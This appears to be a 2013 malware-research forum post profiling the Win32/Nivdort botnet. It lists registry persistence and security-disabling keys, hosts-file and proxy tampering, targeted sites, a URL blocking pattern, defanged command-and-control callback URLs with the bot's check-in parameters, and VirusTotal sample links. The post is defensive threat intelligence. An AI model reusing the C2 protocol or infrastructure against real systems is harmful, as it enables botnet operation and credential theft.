Win32/Nivdort

#21348 by unixfreaxjp
Wed Nov 06, 2013 1:16 pm

I couldn't find this topic. so first pls allow me to post the malware base information (based on 2 month tracking this botnet)

Variant Name:

Code: Select all

Win32/Nivdort
sometimes as Win32/Bayrob or as Symmi < very confusing..

Typical characteristic to quick identify this threat:

Code: Select all

//autostart..
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\**etc etc

// usual kick up service..
SERVICES_ACTIVE_DATABASE

// overwrite hosts (in unix is /etc/hosts) ...
C:\WINDOWS\system32\\drivers\etc\hosts

// exe in temp....
C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\zvostv1nl1hdgydpehn.exe (random example)

// exe implanted...
C:\Documents and Settings\<USER>\Start Menu\Programs\Startup\zmgbnushjwx.exe
C:\WINDOWS\system32\zmgbnushjwx(random example).exe

// accessing path like:
C:\WINDOWS\system32\pouuifospsdv(random example)\tst
C:\WINDOWS\system32\pouuifospsdv(random example)\lck
C:\WINDOWS\system32\pouuifospsdv(random example)\upd
C:\WINDOWS\system32\pouuifospsdv(random example)\etc
C:\WINDOWS\system32\pouuifospsdv(random example)\run

// tweaked infected PC security level:
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify (1)
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallOverride (1)
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\AntiVirusDisableNotify (1)
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\AntiVirusOverride (1)

//And your internet/proxy setting...
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyEnable" = "0"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass" = "1"
HKU\xxxx\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy (1)
HKU\xxxx\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings (1)

// ..obviously to open a  proxy in 80
$cat %UserProfile%\Application Data\Mozilla\Firefox\Profiles\[CURRENT PROFILE]\user.js
user_pref("network.proxy.type", 0);

Sniffed information (stealing purpose):

Code: Select all

*.ebay.com
*.ups.exe
*.escrow.com

Botnet Command:

Code: Select all

//Requests (Details is in Botnet Callbacks PoC section):
method= validate (&mode=sox,email), ping, cfg, var-ip, 
        setvar (&key=cpuinfo&value=%CPU%), 
		   checkport (&port=51573), all&flag

rsid=infected/HostID
sox=IP Address in Hex
v=VERSION_NUMBER ; or; ver=VERSION_NUMBER(001-013)

BotNet sent value (FLAGS)

Code: Select all

lport=0,1
slots=0,1
spm=0,1 // noted this flag exist.. suspected spam functions

Mitigation string for blocking purpose(not a regex, be noted):

Code: Select all

*/forum/search.php?method=*

Botnet Callbacks PoC:

Code: Select all

h00p://lookloss.net/forum/                     search.php?method=validate&mode=my&email=EMAIL-ADDR@DOMAIN.COM&lici=auto_000860&ver=013

h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=002&sox=2521d800
h00p://gadgets-small-talk-community.com/forum/ search.php?method=validate&mode=sox&v=000&sox=2c453000
h00p://spumkaguga.com/forum/                   search.php?method=validate&mode=sox&v=000&sox=2c453000
h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=000&sox=2c453000
h00p://signform.net/forum/                     search.php?method=validate&mode=sox&v=000&sox=2c453000

h00p://gadgets-small-talk-community.com/forum/ search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01
h00p://spumkaguga.com/forum/                   search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01
h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01

h00p://elementarimagine.com/forum/             search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01
h00p://elementarimagine.com/forum/             search.php?method=ping&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=cfg&oknet&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=var-ip&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3184+MHz)
                                                         &mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=setvar&key=stopped&value=2cb48400
                                                         &mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=2cb48400&slots=0&spm=0
														 
h00p://spumkaguga.com/forum/                   search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://gadgets-small-talk-community.com/forum/ search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://palsticsurgery-community.com/forum/     search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://elementarimagine.com/forum/             search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://spumkaguga.com/forum/                   search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://gadgets-small-talk-community.com/forum/ search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://palsticsurgery-community.com/forum/     search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01

h00p://elementarimagine.com/forum/             search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://elementarimagine.com/forum/             search.php?method=ping&mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=cfg&oknet&mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=var-ip&mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3186+MHz)
	                                                     &mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0

h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=001&sox=2b61f601
h00p://elementarimagine.com/forum/             search.php?method=validate&mode=sox&v=001&sox=2b61f601
h00p://elementarimagine.com/forum/             search.php?method=all&flag&mode=sox&v=001&sox=2b61f601&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3187+MHz)
                                                         &mode=sox&v=001&sox=2b61f601&lport=1&rsid=NOSOXYID123&slots=0&spm=0

h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=005&sox=2c905800
h00p://elementarimagine.com/forum/search.php?method=all&flag&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3186+MHz)&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=checkport&port=51573&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0

h00p://dominoclub-grup.com/forum/search.php?method=validate&mode=sox&v=001&sox=2c4ce602
h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=001&sox=2c4ce602
h00p://faircross.net/forum/search.php?method=validate&mode=sox&v=001&sox=2c4ce602

h00p://gadgets-small-talk-community.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://spumkaguga.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://dominoclub-grup.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://elementarimagine.com/forum/search.php?method=all&flag&mode=sox&v=000&sox=19baba0c&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3187+MHz)&mode=sox&v=000&sox=19baba0c&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=all&mode=sox&v=000&sox=19baba0c&lport=1&rsid=NOSOXYID123&slots=0&spm=0

Recent Sample Investigated:

Code: Select all

https://www.virustotal.com/en/file/b8b93f40046495d44c6855a1c86c9357a030023c914d298bb9b60551b21d79b3/analysis/
https://www.virustotal.com/en/file/eea059174127860154f4dce1a7d8995a9a5056febf73819d63ddadb522ed6c8f/analysis/
https://www.virustotal.com/en/file/07d753966944f8425453bf201c51873abc67f674d9582bcc90e4532efeea67c6/analysis/
https://www.virustotal.com/en/file/ae6a43cc8b47819407b5e8852bdf554be8f1ad0364345963bfd44b3c3cdb9556/analysis/
https://www.virustotal.com/en/file/416d3eda1483e0addbcba0218750f75a90c569ba4cf5e2227e1d909fdf93d630/analysis/
https://www.virustotal.com/en/file/c4b29278fc90c4e87a1d3d524c96373f7326726b9c653b5d62d4555265ec7215/analysis/
https://www.virustotal.com/en/file/12a24575409c67c2860e58adba8333c70c8cc5f8a53f3910463323af7c7aca40/analysis/
https://www.virustotal.com/en/file/39598e475d12e492c1b7d2c1091c5ec040d3c8365d4825140a3cb743799e57c3/analysis/
https://www.virustotal.com/en/file/a9e2fe1dbb39902ff1cf2bcaabcf5676418c4dced3ddc18db680c7459dd9ab9c/analysis/
https://www.virustotal.com/en/file/e9ec6e9b74e5405a7427a8aee7beb4c522d2b97275fb19026bd8a33898f60249/analysis/
https://www.virustotal.com/en/file/2fa162050b6cf23feec40931b6b8f10f9addc3d00b2a8ab4c95c9c71bcfced96/analysis/
https://www.virustotal.com/en/file/37286961d40a37586e005ce6d9a9e88257d6299a2091802afa4ab2f21b875497/analysis/
https://www.virustotal.com/en/file/2fb070d0313b02008075a806455353367a95d49a077332a075c161b97726204a/analysis/
https://www.virustotal.com/en/file/484994eaa8da3e419e5e175a47020ffdb41aee38f13d9aa45c2c614a297c42a1/analysis/

Last edited by unixfreaxjp on Wed Nov 06, 2013 1:56 pm, edited 7 times in total.

Username

unixfreaxjp

Posts

501

Joined

Thu Apr 12, 2012 4:53 pm

Win32/Nivdort

Win32/Nivdort

Re: Win32/Nivdort

Attachments

Re: Win32/Nivdort

Re: Win32/Nivdort

Attachments

Re: Win32/Nivdort

Re: Win32/Nivdort

Attachments

Re: Win32/Nivdort